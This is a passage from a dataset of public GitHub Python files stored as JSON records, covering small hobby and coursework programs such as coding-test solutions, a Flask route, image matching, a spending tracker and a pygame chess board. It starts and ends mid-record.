list(map(list, itertools.permutations(data)))\n\n\nif __name__ == \"__main__\":\n print(solution([1, 2, 3]))\n print(solution2([1, 2, 3]))\n","repo_name":"Leekm0912/codingTest","sub_path":"그래프/순열.py","file_name":"순열.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73426913448","text":"def division(a,b):\n try:\n resultado = a/b\n print(resultado)\n except ZeroDivisionError:\n print('Error! No se puede realizar la division por 0')\n\ndef division_excepciones(a):\n try:\n divisor = input('Ingrese el divisor: ')\n resultado = a/divisor\n print(resultado)\n except TypeError:\n print('Error! no se puede operar int con str')\n except ValueError:\n print('Error! Debe ingresar un formato numerico')\n except ZeroDivisionError:\n print('Error! No se puede realizar la division por 0')\n\n#SIN Excepcion\ndef division_sin_excp(a,b):\n return a/b\n\ndef main():\n #a = 20/0\n #n= int(input('Ingrese un numero: '))\n #print('hola')\n # division(10,0)\n # division(10,2)\n #division_excepciones(10)\n\n # try:\n # print(division_sin_excp(10,0))\n # except Exception as e:\n # print('Algo raro paso',e)\n\n while True:\n try:\n total = 0\n sumandos = input('Ingresa numeros separados por espacios: ')\n sumandos = sumandos.split()\n for num in sumandos:\n if num.isnumeric():\n total += float(num)\n else:\n raise ValueError('El valor ingresado no es numerico')\n except ValueError as e:\n print(e)\n print('Vuelva a ingresar los numeros: ')\n else:\n print(f'La suma es: {total}')\n break\n finally:\n print('Ha terminado el proceso, se vimos!')\n \n print('Fin del main')\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"broko-de/22818-Django-MaterialClases","sub_path":"Clase5/claseFullstackEjemplos/excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"es","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"34839713858","text":"import numpy as np\nimport pickle\n\nclass FaceRecognizer():\n\n DESCRIPTORS = \"face_descriptors.npy\"\n LABELS = \"labels.pickle\"\n\n def __init__(self):\n print(\"Retrieving recognition database...\")\n self.descriptors = np.load(FaceRecognizer.DESCRIPTORS)\n # will be loaded as a 1D array, so needs to be\n # reshaped back into a n x 128 arrary\n self.descriptors = self.descriptors.reshape (-1,128)\n f = open(FaceRecognizer.LABELS, 'rb')\n self.labels = pickle.load(f) # in bytes\n \n def recognize_face(self, face_descriptor, threshold = 0.7):\n distances = np.linalg.norm(self.descriptors - face_descriptor, axis=1)\n argmin = np.argmin(distances)\n min_dist = distances[argmin]\n if min_dist > (1 - threshold):\n name = \"unknown\"\n else:\n name = self.labels[argmin]\n print(name,\"@\",str(int(100.0*(1-min_dist))) + \"%\")\n return name","repo_name":"hopkira/coral-dalek","sub_path":"recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42186558538","text":"from utility import parseInputDay5\nfrom typing import List\n\nclass Solution:\n\n def stack_crate_operator(self, use_real_input: bool = False, second_problem: bool = False) -> str:\n \"\"\"\n Returns a str of the top letters of each stack of boxes\n :param use_real_input: bool. Use real data if True, else test data\n :param second_problem: bool. If True then return answer for second part\n :return: str. Str containing the letters of the top of each stack\n \"\"\"\n res = \"\"\n # O(N) time, O(N) space where N is the number of lines\n stacks, instructions = parseInputDay5(\"test.txt\") if not use_real_input else parseInputDay5(\"real.txt\")\n\n # O(N) time where N is the number of lines for instructions\n for instruction in instructions:\n # Move M number of boxes from one stack to another\n tmp_stack: List[str] = []\n for _ in range(instruction[2]):\n tmp_stack.append(stacks[instruction[0] - 1].pop())\n if second_problem:\n # In second problem, just reverse the stack we are popping from\n tmp_stack = tmp_stack[::-1]\n stacks[instruction[1] - 1].extend(tmp_stack)\n # Finally, pop the top of each stack to our res:\n for stack in stacks:\n res += stack.pop()\n return res\n\nrun = Solution()\nprint(run.stack_crate_operator(True, False))\nprint(run.stack_crate_operator(True, True))\n","repo_name":"gyao852/adventOfCode2022","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72040231527","text":"#!/usr/bin/env python3\n\nimport jug\nimport subprocess\nfrom pathlib import Path\nimport sys\nimport os\n\nexperiments_dir = Path(__file__).parent.parent\n\n@jug.TaskGenerator\ndef train_sgd(log_dir, **config):\n os.makedirs(log_dir, exist_ok=False)\n\n script = experiments_dir / \"train_sgd.py\"\n args = [\"nice\", \"-n19\", sys.executable, script,\n *[f\"--{k}={v}\" for k, v in config.items()]]\n print(f\"Running in cwd={log_dir} \" + \" \".join(map(repr, args)))\n complete = subprocess.run(args, cwd=log_dir)\n if complete.returncode != 0:\n raise SystemError(f\"Process returned with code {complete.returncode}\")\n return complete\n\nbase_dir = experiments_dir.parent/\"logs/sgd-no-weight-decay\"\njug.set_jugdir(str(base_dir/\"jugdir\"))\nfor net in [\"dense\", \"conv\"]:\n\n for i in reversed(range(10)):\n log_dir = base_dir/f\"mnist_classification{net}net\"/str(i)\n print(log_dir)\n if net == \"dense\":\n train_sgd(str(log_dir), model=\"classificationdensenet\", data=\"mnist\", width=100)\n elif net == \"conv\":\n train_sgd(str(log_dir), model=\"classificationconvnet\", data=\"mnist\", width=64)\n else:\n raise ValueError(net)\n","repo_name":"ratschlab/bnn_priors","sub_path":"experiments/jug/0_12_mnist_no_weight_decay.py","file_name":"0_12_mnist_no_weight_decay.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"38277466615","text":"import numpy as np\nimport time\nimport sys\n\ndef progress_bar(done, total, message):\n sys.stdout.flush()\n sys.stdout.write('\\r')\n progress = (done/np.double(total))\n sys.stdout.write(\"%s: [%-20s] %d%%\" % (message, '='*np.int(progress*20), np.int(progress*100)))\n sys.stdout.flush()\n\nif __name__==\"__main__\":\n for ind, item in enumerate(range(200)):\n time.sleep(0.01)\n progress_bar(ind, 200, 'Testing:')\n","repo_name":"sjara/jaratest","sub_path":"nick/utils/progressbar.py","file_name":"progressbar.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25420783771","text":"import json\nimport requests\nfrom flask import Flask, render_template,request\nfrom flask import Blueprint\n\nmostPopular = Blueprint('mostPopular', __name__)\n\n@mostPopular.route('/MostPopular/<page>')\ndef mostPopularfun(page):\n page = int(page)\n try:\n mostPop = requests.get('https://api.jikan.moe/v3/top/anime/{}/bypopularity'.format(page)).json()['top']\n if mostPop:\n return render_template('mostPop.html', data = mostPop, nextPage = page+1, title = \"MostPopular\") \n else:\n raise Exception()\n except:\n return render_template('NoResult.html',title ='No Result')","repo_name":"Kaemaros/SWU-CP353WebTechnology2-2019-Midterm-project","sub_path":"blueprints/mostPopular.py","file_name":"mostPopular.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39387083543","text":"import json\nimport pathlib\n\nfrom domain.book import BookDecoder, BookEncoder\nfrom repository.generic_repo import GenericRepository\n\n\nclass JsonRepository(GenericRepository):\n\n def __init__(self, file_name):\n super().__init__()\n self.__file_name = file_name\n\n def load(self):\n abspath = pathlib.Path(self.__file_name).absolute()\n with open(self.__file_name, 'r') as f:\n try:\n data = json.load(f)\n for d in data:\n book = json.loads(d, cls=BookDecoder)\n self._all_books[book.isbn] = book\n except Exception as e:\n print(e)\n f.close()\n\n def save(self):\n abspath = pathlib.Path(self.__file_name).absolute()\n with open(self.__file_name, 'w') as f:\n all_books_json = []\n for book in self._all_books.values():\n all_books_json.append(json.dumps(book, cls=BookEncoder))\n json.dump(all_books_json, f)\n f.close()\n","repo_name":"IoanaGabor/University","sub_path":"Semester-1/Fundamentals Of Programming/assignments/a7-913-Gabor-Ioana/src/repository/json_repository.py","file_name":"json_repository.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11323015629","text":"import math\n\ndef f(a,b,c):\n return math.sin(a*b*c)**2/(a*a+b*b+c*c)\n\ndef main():\n s = float(input('s= '))\n t = float(input('t= '))\n p=(f(1,t*t,s)+f(t,s*s,1))/(1+f(1,t*s,1)**2)\n print(p)\n\nif __name__ == '__main__':\n main()\n","repo_name":"DoNjOnIn/5.1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1777859938","text":"import random\nimport re\n\nSECURE = True\n\nzwischenPattern = re.compile(r'.*(von|zwischen) (-?\\d+) (und|bis) (-?\\d+).*', re.I)\nbisPattern = re.compile(r'.*(bis|kleiner gleich) (-?\\d+).*', re.I)\nkleinerPattern = re.compile(r'.*(unter|kleiner) (als)? (-?\\d+).*', re.I)\n\ndef output(txt, tiane):\n output = ''\n tt = txt.replace('.', (''))\n tt = tt.replace('?', (''))\n tt = tt.replace('!', (''))\n tt = tt.replace('.', (''))\n tt = tt.replace(',', (''))\n tt = tt.replace('\"', (''))\n tt = tt.replace('(', (''))\n tt = tt.replace(')', (''))\n tt = tt.replace('€', ('Euro'))\n tt = tt.replace('%', ('Prozent'))\n tt = tt.replace('$', ('Dollar'))\n text = tt.lower()\n t = str.split(text)\n if 'münze' in text or ('kopf' in text and 'oder' in text and 'zahl' in text):\n q = random.randint(1,2)\n if q == 1:\n output = 'kopf'\n else:\n output = 'zahl'\n elif 'würfel' in text or 'alea iacta est' in text:\n q = random.randint(1,6)\n if q == 1:\n output = 'eins'\n elif q == 2:\n output = 'zwei'\n elif q == 3:\n output = 'drei'\n elif q == 4:\n output = 'vier'\n elif q == 5:\n output = 'fünf'\n else:\n output = 'sechs'\n elif (('zufall' in text or 'zufällig' in text) and 'zahl' in text):\n try:\n match = zwischenPattern.match(text)\n if (output == '' and match is not None):\n if (int(match.group(2)) < int(match.group(4))):\n output = str(random.randint(int(match.group(2)), int(match.group(4))))\n else:\n output = str(random.randint(int(match.group(4)), int(match.group(2))))\n match = bisPattern.match(text)\n if (output == '' and match is not None):\n if (match.group(2) > 0):\n output = str(random.randint(1, int(match.group(2))))\n else:\n output = str(random.randint(int(match.group(2)), 1))\n match = kleinerPattern.match(text)\n if (output == '' and match is not None):\n if (match.group(3) > 0):\n output = str(random.randrange(1, int(match.group(3))))\n else:\n output = str(random.randrange(int(match.group(3)), 1))\n except ValueError:\n output = ''\n if (output == ''):\n output = str(random.randint(1,100))\n return output\n\ndef handle(text, tiane, profile):\n ausgabe = output(text, tiane).strip()\n if (ausgabe.startswith('-')):\n ausgabe = 'minus ' + ausgabe[1:]\n tiane.say(ausgabe)\n\ndef isValid(txt):\n tt = txt.replace('.', (''))\n tt = tt.replace('?', (''))\n tt = tt.replace('!', (''))\n tt = tt.replace('.', (''))\n tt = tt.replace(',', (''))\n tt = tt.replace('\"', (''))\n tt = tt.replace('(', (''))\n tt = tt.replace(')', (''))\n tt = tt.replace('€', ('Euro'))\n tt = tt.replace('%', ('Prozent'))\n tt = tt.replace('$', ('Dollar'))\n text = tt.lower()\n if 'münze' in text or ('kopf' in text and 'oder' in text and 'zahl' in text) or 'würfel' in text or (('zufall' in text or 'zufällig' in text) and 'zahl' in text):\n return True\n\nclass Tiane:\n def __init__(self):\n self.local_storage = {}\n self.user = 'Baum'\n self.analysis = {'room': 'None', 'time': {'month': '08', 'hour': '06', 'year': '2018', 'minute': '00', 'day': '27'}, 'town': 'None'}\n\n def say(self, text):\n print (text)\n def listen(self):\n neuertext = input()\n return neuertext\n\ndef main():\n profile = {}\n tiane = Tiane()\n handle('Tiane wirf einen würfel', tiane, profile)\n\nif __name__ == '__main__':\n main()\n","repo_name":"FerdiKr/TIANE","sub_path":"server/modules/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"42875663901","text":"import itchat\n\nitchat.auto_login()\n\n@itchat.msg_register([itchat.content.TEXT])\ndef text_reply(msg):\n# print(msg)\n nickName = itchat.search_friends(userName=msg['FromUserName'])['NickName']\n if nickName == '张芮溟' or nickName == 'No. L':\n itchat.send(('鸡年大吉'), msg['FromUserName'])\n\nitchat.run()\n","repo_name":"freealong/WeChatRobot","sub_path":"AutoReply.py","file_name":"AutoReply.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10289536528","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nfrom skimage import io\nimport time\n\ndef resizing_img(img_para):\n height, width = img_para.shape[:2]\n thumbnail = cv.resize(img_para, (round(width/5), round(height/5)), interpolation = cv.INTER_AREA)\n return thumbnail\n\n\ndef matching_sift(query_img, train_img):\n MIN_MATCH_COUNT = 10\n img1 = query_img # queryImage\n img2 = io.imread(train_img) # trainImage\n img1 = resizing_img(img1)\n img2 = resizing_img(img2)\n\n try:\n w, h, c = img2.shape\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n except ValueError as e :\n\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = img2\n\n\n # Initiate SIFT detector\n sift = cv.xfeatures2d.SIFT_create()\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(gray1,None)\n kp2, des2 = sift.detectAndCompute(gray2,None)\n FLANN_INDEX_KDTREE = 1\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks = 50)\n flann = cv.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n # store all the good matches as per Lowe's ratio test.\n good = []\n for m,n in matches:\n if m.distance < 0.7*n.distance:\n good.append(m)\n\n if len(good) > MIN_MATCH_COUNT:\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC, 5.0)\n matchesMask = mask.ravel().tolist()\n h, w, d = img1.shape\n pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\n dst = cv.perspectiveTransform(pts, M)\n img2 = cv.polylines(img2, [np.int32(dst)], True, 255, 3, cv.LINE_AA)\n else:\n # print(\"Not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n matchesMask = None\n\n # if len(good) > 50:\n # draw_params = dict(matchColor = (0,255,0), # draw matches in green color\n # singlePointColor = None,\n # matchesMask = matchesMask, # draw only inliers\n # flags = 2)\n # img3 = cv.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)\n # return len(good)\n # else:\n return len(good)\n\n\nstart_time = time.time()\n\ninput_img = io.imread(\"img/g_pic.jpeg\")\nimg_list = ['img/r2.jpg','img/r3.jpg','img/r6.jpg','img/r7.jpg','img/r8.jpg','img/r14.jpg','img/r15.jpg','img/r16.jpg','img/r17.jpg','img/r19.jpg','img/r20.jpg','img/r1.jpg','img/g1.jpeg','img/low8.jpeg','img/low7.jpeg','img/low5.jpeg','img/g6.png','img/g7.jpeg','img/g8.jpeg','img/g9.jpeg','img/low4.jpeg',\"img/g_pic2.jpg\"]\nprint(\"list length is \"+str(len(img_list)))\nresult = []\n\nfor t_img in img_list:\n result.append(matching_sift(input_img, t_img))\n\nprint(\"result\")\ni = max(result)\nprint(i)\ni = result.index(i)\nprint(img_list[i])\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"ngost/Repeat_Image_Detector","sub_path":"root/sift_matching_example.py","file_name":"sift_matching_example.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16747666894","text":"\"\"\"Update Reservation model\n\nRevision ID: 1932d1816dbb\nRevises: 8a02e178fd18\nCreate Date: 2016-01-12 13:09:41.079367\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1932d1816dbb'\ndown_revision = '8a02e178fd18'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Reservations', sa.Column('paid', sa.Integer(), nullable=True))\n op.add_column('Reservations', sa.Column('reason', sa.String(300), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Reservations', 'reason')\n op.drop_column('Reservations', 'paid')\n ### end Alembic commands ###\n","repo_name":"mbtronics/BAB","sub_path":"migrations/versions/1932d1816dbb_update_reservation_model.py","file_name":"1932d1816dbb_update_reservation_model.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37937773477","text":"from random import choice\r\n\r\nquestions = [\"Why is the earth round?: \", \"Why is the sun so bright?: \", \"Why is the sky blue?: \"]\r\n\r\nquestion = choice(questions)\r\nanswer = input(question).strip().lower()\r\n\r\nwhile answer != \"just because\":\r\n answer = input(\"why?: \").strip().lower()\r\n \r\n \r\nprint(\"Oh.....Okay.\")\r\n","repo_name":"akaif95/BabyQuestions","sub_path":"baby.py","file_name":"baby.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39908306009","text":"import os\n\nimport numpy as np\nfrom scipy.io import wavfile\nimport math\n\nfrom random import randint\n\ndef get_audio_files(directory):\n files = []\n for dirname, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n if '.wav' in filename:\n files.append(os.path.abspath(os.path.join(dirname, filename)))\n return files\n\n\ndef avg_audio(paths, out, duration):\n shortest = math.inf\n wavfiles = []\n rate = None\n for path in paths:\n fs, data = wavfile.read(path)\n rate = fs\n track = data.T[0]\n size = len(track)\n shortest = size if size < shortest else shortest\n wavfiles.append(track)\n\n num_tracks = len(wavfiles)\n chunk = rate * duration\n avg = np.zeros(chunk)\n for track in wavfiles:\n index = randint(0, shortest - chunk)\n track = track[index:index+chunk]\n avg = avg + track / num_tracks\n\n wavfile.write(out, rate, avg)\n\nDURATION = {\n 'short': '-d',\n 'verbose': '--duration',\n 'help': 'length of the output in seconds',\n 'required': False,\n 'type': int\n}","repo_name":"rochester-rcl/dhsi-multimedia-examples","sub_path":"dhsi_multimedia/audio/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36053111057","text":"# Draw Board\n# Date - 16/09/2020\n\nimport pygame\npygame.init()\n\nclass DrawChessBoard():\n def __init__(self, gamePosition): \n import pygame\n import collections\n import os\n pygame.init()\n\n boardSize=(640, 640)\n mainBoard = pygame.display.set_mode(size=boardSize)\n boardImg = pygame.image.load(os.path.join('sprites', 'myboard.png')).convert_alpha()\n boardImg = pygame.transform.scale(boardImg, (640, 640))\n peiceImg = pygame.image.load(os.path.join('sprites', 'peicesImg.png')).convert_alpha()\n peiceImg = pygame.transform.scale(peiceImg, (480, 160))\n\n mainBoard.blit(boardImg, (0,0))\n mainBoard.blit(peiceImg, (0, 0), (0,0,480,480)) # top, left, height, width\n pygame.display.update() \n\n\n\nrun = True\nwhile(run):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n DrawChessBoard(0)\n\n \n\n ","repo_name":"sarang323patil/chess","sub_path":"drawBoard.py","file_name":"drawBoard.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14218660713","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nclass Graph:\n \"\"\"Displays the user's spendings.\n \n Attributes:\n purchase_data (dataframe): a dataframe that stores the user's spendings.\n \n \"\"\"\n def open_file(self, purchase_data):\n \"\"\"Opens a CSV file and turns it into a dataframe.\n\n Args:\n purchase_data: a dataframe that stores the user's spendings.\n \n Returns:\n A dataframe for the inputed CSV file.\n \"\"\"\n purchase_data = pd.read_csv(\"sample_data.csv\")\n self.purchase_data = purchase_data\n print(purchase_data)\n return purchase_data\n\n def graph(self):\n \"\"\"Creates a time series graph based off of the given data. \n\n Args:\n purchase_data (dataset): a dataframe of all purchases.\n \n Returns:\n A time series graph for all purchases that have been made. \n \n Source:\n I had used information from pandas.pydata.org to help develop the \n code for the time series graph below. The main thing that I had used \n from the website was the general layout of plot() because at the time \n of creating this code I had no idea how to use plot(). The reason I\n used this specific source is because I was trying to plot data from\n a dataframe. The modifications that I had made was changing the x\n and y values, along with adding a marker and other aspects such as\n a title to make the graph more visually appealing. \n \n https://pandas.pydata.org/pandas-docs/version/0.23/generated/pandas.\n DataFrame.plot.html\n \"\"\"\n self.purchase_data.plot(kind = 'line',\n x = 'Date',\n y = 'Cost',\n color = 'blue',\n marker = 'o')\n plt.title('Purchases Over Time')\n plt.xlabel('Date')\n plt.ylabel('Cost in $')\n plt.grid(True)\n plt.show()\n \n def avg_pie(self):\n \"\"\"Creates a new dataframe and a pie graph for the average of each item \n type given in the data. \n \n Returns:\n A new dataframe and pie chart for the average percentage spent \n on each item type.\n \n Source:\n I had used information from pandas.pydata.org to help develop the \n code for the pie graph below. Since I had the general structure from\n the graph method, all I had to do was set the kind=pie. However, for\n the other parameters such as autopct and explode, I had used \n matplotlib.org to set those up. The reason I wanted those two \n parameters in the pie chart are to display the percentages on each\n slice and create a more visually appealing pie chart with the \n explode parameter. The modifications I had made were setting the\n specific plot to a pie plot, adding a specific figure size, and\n changing the startangle.\n \n https://matplotlib.org/stable/gallery/pie_and_polar_charts/pie_feat\n ures.html\n \"\"\"\n avg = self.purchase_data.groupby(\"Item type\")[\"Cost\"].mean()\n avg.plot(\n kind='pie', autopct='%1.1f%%', explode=(0.1, 0.1, 0.1, 0.1),\n title='Average Percentage Spent Per Item Type',\n figsize=(7,7),\n startangle=90)\n plt.show()\n \nclass Spending:\n \"\"\"Records a user's spendings\n \n \n Attributes:\n cost (list): \n a list of the cost of the items that a user buys\n \n item_type (int): \n a list of the types of items a user spends their money on\n \n item (list): \n a list of the specific items a user buys\n \n date (list): \n a list of the dates that a user made their purchases\n \n \"\"\"\n def __init__(self, cost, item_type, item, date):\n \"\"\"Initializes values\n \n Args: \n cost (list): \n a list of the cost of the items that a user buys\n \n item_type (int): \n a list of the types of items a user spends their money on\n \n item (list): \n a list of the specific items a user buys\n \n date (list): \n a list of the dates that a user made their purchases\n \n Side effects:\n initializes values\"\"\"\n self.item_type = list(item_type)\n self.item = list(item)\n self.cost = list(cost)\n self.date = list(date)\n \n def create_df(self):\n \"\"\"Creates a dataframe of purchases\n \n Returns:\n df: a dataframe of all the purchases made\n \n Side effects:\n creates self.df, which is initialized here and used in other methods\n \"\"\"\n \n data = {'Date': self.date,'Item Type': self.item_type, \n 'Item': self.item, 'Cost': self.cost}\n df = pd.DataFrame(data)\n self.df = df\n return(df.to_string(index=False))\n \n def file_commit(self, commit, file):\n \"\"\"Sends the user created df to a .csv file\n \n Args: \n commit(boolean): whether or not the purchases want to be added to\n a file\n \n file(string): a string containing a path to a file that the user\n has the option to write to\n \n Side effects:\n Writes data to a file\"\"\"\n if commit == True:\n self.df.to_csv(file, mode='a', header=False, index=False)\n \n\ndate_list = []\nitem_type_list = []\nitem_list = []\ncost_list = []\ncounter = 0\n\nprint(\"Welcome to the input for your purchases. If you wish to stop making \" + \n \"purchases at any time, you can enter 0 for the cost of the item.\")\nwhile True:\n cost = float(input(\"How much did your item cost: \"))\n if cost == 0:\n break\n cost_list.append(cost)\n item_type = input(\"What kind of item did you buy (Food, Other, Utilities,\"\n +\" or Personal): \")\n item_type_list.append(item_type)\n item = input(\"What item did you buy: \")\n item_list.append(item)\n date = input(\"On what date did you make the purchase: \")\n date_list.append(date)\n counter+=1\n user_data = Spending(cost_list, item_type_list, item_list, date_list)\n print(user_data.create_df())\nif counter == 1:\n print(f\"You have made {counter} purchase overall\")\nelse:\n print(f\"You have made {counter} purchases overall\")\nif counter > 0:\n commit = input(\"Would you like to commit to a file: \")\n if commit == 'y':\n user_data.file_commit(True,\"sample_data.csv\")\n graphing = Graph()\n graphing.open_file(\"sample_data.csv\")\n graphing.graph()\n graphing.avg_pie()\n else:\n graphing = Graph()\n graphing.open_file(\"sample_data.csv\")\n graphing.graph()\n graphing.avg_pie()\n \nprint(\"Thank you for using the program!\")\n","repo_name":"edeng12/silver-chainsaw","sub_path":"spendings.py","file_name":"spendings.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9055178811","text":"__version__ = '0.1.1'\n\nimport sys\n\n\ndef _index_of(lst, v):\n try:\n return lst.index(v)\n except ValueError:\n return -1\n\n\ndef has_flag(flag: str, argv=sys.argv) -> bool:\n prefix = '' if flag.startswith('-') else ('-' if len(flag) == 1 else '--')\n position = _index_of(argv, prefix + flag)\n terminator_position = _index_of(argv, '--')\n return position != -1 and (terminator_position == -1 or position < terminator_position)\n","repo_name":"shawwn/has-flag-python","sub_path":"has_flag/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13360502397","text":"import numpy as np\nimport torch\nimport cv2\n\ndef cam(x, image_size=256):\n cam_img = np.interp(x, (x.min(), x.max()), (0, 255)).astype(np.uint8)\n cam_img = cv2.resize(cam_img, (image_size, image_size))\n cam_img = cv2.applyColorMap(cam_img, cv2.COLORMAP_JET)\n return cam_img\n\n\ndef tensor2im(input_image, imtype=np.uint8, use_cam=False, image_size=256):\n \"\"\"\n Converts a Tensor array into a numpy image array.\n :param input_image: (tensor) the input image tensor array\n :param imtype: (type) the desired type of the converted numpy array\n :return:\n \"\"\"\n\n if not isinstance(input_image, np.ndarray):\n if isinstance(input_image, torch.Tensor): # get the data from a variable\n image_tensor = input_image.data\n else:\n return input_image\n image_numpy = image_tensor[0].cpu().float().numpy() # convert it into a numpy array\n if image_numpy.shape[0] == 1: # grayscale to RGB\n image_numpy = np.tile(image_numpy, (3, 1, 1))\n\n if use_cam:\n image_numpy = cam(np.transpose(image_numpy, (1, 2, 0)), image_size)\n else:\n image_numpy = (np.transpose(image_numpy,\n (1, 2, 0)) + 1) / 2.0 * 255.0 # post-processing: tranpose and scaling\n else: # if it is a numpy array, do nothing\n image_numpy = input_image\n return image_numpy.astype(imtype)","repo_name":"jayzhan211/ImageT","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24737176757","text":"from collections import deque\n\nn, k = map(int, input().split())\nvisited = [-1] * 100001\n\nif n >= k:\n print(n-k)\nelse:\n queue = deque()\n queue.append(n)\n visited[n] = 0\n while queue:\n q = queue.popleft()\n if q*2 > 0 and q*2 <= 100000:\n if visited[q*2] == -1:\n visited[q*2] = visited[q]\n queue.append(q*2)\n\n for i in (q-1, q+1):\n if i >= 0 and i <= 100000:\n if visited[i] == -1:\n visited[i] = visited[q] + 1\n queue.append(i)\n else:\n if visited[i] > visited[q] + 1:\n visited[i] = visited[q] + 1\n\n print(visited[k])\n\n# [참고]\n# 이거 어떻게 생각해.....\n# def c(n,k):\n# if n >= k:\n# return n-k\n# elif k == 1:\n# return 1\n# elif k % 2: # k가 홀수이면 무조건 1 더하고 k-1과 k+1로 n을 만드는 방법 중에 최소 횟수 찾기\n# return 1 + min(c(n,k-1),c(n, k+1))\n# else: # k%2 == 0 k가 짝수이면 2 나눌때는 아무것도 더하지 않으니까 '2를 나눈수 중에서 n을 만드는 방법과 k에서 n까지 -1을 하는 방법' 중 최소 횟수 찾기\n# return min(k-n, c(n,k//2))\n# n, k = map(int,input().split())\n# print(c(n,k))\n","repo_name":"miseongk/Algorithm","sub_path":"BAEKJOON/Part/Part4/13549.py","file_name":"13549.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18144465577","text":"# #box\n# import pandas as pd\n# import numpy as np\n# from sklearn.cluster import KMeans\n# import plotly.graph_objects as go\n\n# df = pd.read_csv('data/60Min.csv')\n# df['datetime'] = pd.to_datetime(df['datetime'])\n# df.set_index(['datetime'], inplace=True)\n# df = df.tail(500)\n# df_prices = np.array(df[\"close\"])\n\n# K = 9\n# kmeans = KMeans(n_clusters=6).fit(df_prices.reshape(-1, 1))\n# clusters = kmeans.predict(df_prices.reshape(-1, 1))\n\n# # Create list to hold values, initialized with infinite values\n# min_max_values = []\n# # init for each cluster group\n# for i in range(6):\n# # Add values for which no price could be greater or less\n# min_max_values.append([np.inf, -np.inf])\n# # Print initial values\n# print(min_max_values)\n# # Get min/max for each cluster\n# for i in range(len(df_prices)):\n# # Get cluster assigned to price\n# cluster = clusters[i]\n# # Compare for min value\n# if df_prices[i] < min_max_values[cluster][0]:\n# min_max_values[cluster][0] = df_prices[i]\n# # Compare for max value\n# if df_prices[i] > min_max_values[cluster][1]:\n# min_max_values[cluster][1] = 